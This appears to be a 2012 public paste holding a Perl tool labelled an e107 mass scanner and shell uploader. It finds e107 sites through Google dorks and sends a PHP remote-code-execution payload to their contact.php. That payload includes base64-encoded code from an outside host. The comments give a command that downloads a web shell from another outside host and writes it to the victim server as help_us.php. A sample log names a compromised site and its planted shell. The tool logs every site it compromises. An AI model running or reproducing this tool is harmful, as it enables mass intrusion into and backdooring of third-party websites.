Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on May 2nd, 2012  |  syntax: None  |  size: 5.94 KB  |  hits: 51  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/perl
  2. # Author: skpx
  3. # e107 mass scanner/shell uploader
  4. # http://www.exploit-db.com/exploits/12715
  5. #
  6. # Change it to whatever
  7. # passthru() command:
  8. # echo "tEStVulN";
  9. # uname -a;
  10. # php -r '$s=@file_get_contents("http://www.yucatekisimo.com/language/shell.txt");$f=@fopen("help_us.php","w");fputs($f,$s);fclose($f);';
  11. # echo "TesTvULn"
  12. #
  13. # If it prints the uname but not a shell match change the cmd to whatever (wget, curl, etc).
  14. #
  15. # http://www.omni-bot.de/e107/contact.php
  16. # [!] Site vulnerable...
  17. # Linux corwin 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 GNU/Linux
  18. # [!] PHP Shell: http://www.omni-bot.de/e107/help_us.php
  19. #
  20. use LWP::UserAgent;
  21. use URI::Escape;
  22.     my @tld = qw { ad ae am as at az ba be bf
  23.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  24.     co.bw co.ck co.cr co.id co.il co.in co.jp
  25.     co.ke co.kr co.ls com co.ma com.af com.ag
  26.     com.ai com.ar com.au com.bd com.bh com.bn
  27.     com.bo com.br com.by com.bz com.co com.cu
  28.     com.do com.ec com.eg com.et com.fj com.gh
  29.     com.gi com.gt com.hk com.jm com.kh com.kw
  30.     com.lb com.ly com.mt com.mx com.my com.na
  31.     com.nf com.ng com.ni com.np com.om com.pa
  32.     com.pe com.ph com.pk com.pr com.py com.qa
  33.     com.sa com.sb com.sg com.sl com.sv com.tj
  34.     com.tr com.tw com.ua com.uy com.vc com.vn
  35.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  36.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  37.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  38.     gy hn hr ht hu ie im is it it.ao je jo kg
  39.     ki kz la li lk lt lu lv md me mg mk ml mn
  40.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  41.     rs ru rw sc se sh si sk sm sn st td tg tk
  42.     tl tm to tt vg vu ws };
  43.     my $term = shift;
  44.     my $rand_tld = rand($#tld);
  45. my $dork  = "Powered by e107".$tld[$rand_tld];
  46. my $match = "AtlantiQ";
  47. my $cmd   = "include(base64_decode(\"aHR0cDovL2l0YWtjaXRvdWtyYWRuYS5pbi9Db2RlL3RiMDEudHh0\"));";
  48. my $log   = "e107-rce-sites.txt";
  49. google_search($dork);
  50. sub google_search {
  51.     # http://www.google.com/supported_domains
  52.     my @tld = qw { ad ae am as at az ba be bf
  53.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  54.     co.bw co.ck co.cr co.id co.il co.in co.jp
  55.     co.ke co.kr co.ls com co.ma com.af com.ag
  56.     com.ai com.ar com.au com.bd com.bh com.bn
  57.     com.bo com.br com.by com.bz com.co com.cu
  58.     com.do com.ec com.eg com.et com.fj com.gh
  59.     com.gi com.gt com.hk com.jm com.kh com.kw
  60.     com.lb com.ly com.mt com.mx com.my com.na
  61.     com.nf com.ng com.ni com.np com.om com.pa
  62.     com.pe com.ph com.pk com.pr com.py com.qa
  63.     com.sa com.sb com.sg com.sl com.sv com.tj
  64.     com.tr com.tw com.ua com.uy com.vc com.vn
  65.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  66.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  67.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  68.     gy hn hr ht hu ie im is it it.ao je jo kg
  69.     ki kz la li lk lt lu lv md me mg mk ml mn
  70.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  71.     rs ru rw sc se sh si sk sm sn st td tg tk
  72.     tl tm to tt vg vu ws };
  73.     my $term = shift;
  74.     my $rand_tld = rand($#tld);
  75.     my $inc = 10;
  76.     my $maxpages = 1024;
  77.     my @links;
  78.     for (my $pagenum = 0;$pagenum <= $maxpages;$pagenum += $inc) {
  79.         my $url = "http://www.google.".$tld[$rand_tld]."/search?q=".uri_escape($term)."&num=100&filter=0&start=".$pagenum;
  80.         my $query = send_query($url);
  81.         while ($query =~ m!href="(https?:\/\/[^>"]*)"!g) {
  82.             if ($1 !~ m!(google|googleusercontent)!) {
  83.                 my $rawlink = $1;
  84.                 my @process=process_links($rawlink);
  85.                 push(@links, @process);                
  86.             }
  87.         } sleep(2);
  88.     } return @links;
  89. }
  90. sub send_query {
  91.     my $url = shift;
  92.     my $ua = LWP::UserAgent->new or die;
  93.     $ua->agent('NULL');
  94.     $ua->timeout(10);
  95.     my $req = HTTP::Request->new(GET => $url);
  96.     my $res = $ua->request($req);
  97.     print $url . "\n";
  98.     return $res->content;
  99. }
  100. sub process_links {
  101.     my @links = shift;
  102.     my @xplurl;
  103.         foreach my $inc (@links) {
  104.         $inc =~ s!%3a!:!gi;
  105.         $inc =~ s!%3f!\/!gi;
  106.         if ($inc =~ m!e107_plugins!g) {
  107.             $inc =~ s!(e107_plugins)[^A-Za-z0-9].*$!!g;
  108.             push(@xplurl, $inc);
  109.         } else {
  110.             $inc =~ s!(https?:\/\/[^\/]+\/?)[^\s]+!$1!;
  111.             push(@xplurl,$inc);
  112.         }
  113.     } exploit_host(@xplurl);
  114. }
  115. sub exploit_host {
  116.     my @host = shift;
  117.     foreach my $inc (@host) {  
  118.         my $ua = LWP::UserAgent->new or die;
  119.         $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  120.         $ua->timeout(10);
  121.        
  122.         my $xpl = $inc . "/contact.php";
  123.         $xpl =~ s/\/\/contact.php/\/contact.php/g;
  124.         my $req = HTTP::Request->new(POST => $xpl);
  125.         $req->content_type('application/x-www-form-urlencoded');
  126.         $req->content("send-contactus=1&author_name=%5Bphp%5D" .$cmd. "%3Bdie%28%29%3B%5B%2Fphp%5D");
  127.        
  128.         my $res = $ua->request($req);
  129.         print $xpl . "\n";
  130.         my $cont = $res->content;
  131.         if ($cont =~ m!tEStVulN\n(.*)!g) {
  132.             my $uname = $1;
  133.             print "[!] Site vulnerable...\n";
  134.             print $uname . "\n";
  135.             # Write to logfile
  136.             open my $lh, '>>', $log or die $!;
  137.             print $lh "$xpl\n";
  138.             print $lh "$uname\n";
  139.             print $lh "-" x 35 . "\n";
  140.             close $lh or die $!;
  141.         } check_shell($xpl);
  142.     } sleep(1);
  143. }
  144. sub check_shell {
  145.     my $gotsh = shift;
  146.     $gotsh =~ s!contact\.php!help_us\.php!;
  147.     my $ua = LWP::UserAgent->new or die;
  148.     $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  149.     $ua->timeout(10);
  150.     my $surl = $gotsh;
  151.     my $req = HTTP::Request->new(GET => $surl);
  152.     my $res = $ua->request($req);
  153.     my $cont = $res->content;
  154.     if ($cont =~ m!$match!) {
  155.         print "[!] PHP Shell: " .$surl. "\n";
  156.         # Write to logfile
  157.         open my $lh, '>>', $log or die $!;
  158.         print $lh "$surl\n";
  159.         print $lh "-" x 35 . "\n";
  160.         close $lh or die $!;
  161.     }
  162. }
create a new version of this paste RAW Paste Data